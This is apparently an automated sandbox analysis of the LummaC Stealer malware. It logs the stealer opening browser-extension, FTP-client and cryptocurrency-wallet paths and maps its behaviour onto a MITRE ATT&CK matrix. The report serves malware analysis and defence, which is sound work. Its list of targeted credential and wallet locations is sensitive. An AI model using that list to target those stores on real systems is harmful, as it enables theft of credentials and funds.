            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
            Tries to steal Crypto Currency Wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: number of queries: 2002
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4132, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		21
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		11
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts311
            Process Injection            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory22
            System Information Discovery            		Remote Desktop Protocol41
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		Logon Script (Windows)Logon Script (Windows)31
            Obfuscated Files or Information            		Security Account Manager121
            Security Software Discovery            		SMB/Windows Admin Shares2
            Clipboard Data            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture124
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets151
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Regsvr32            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
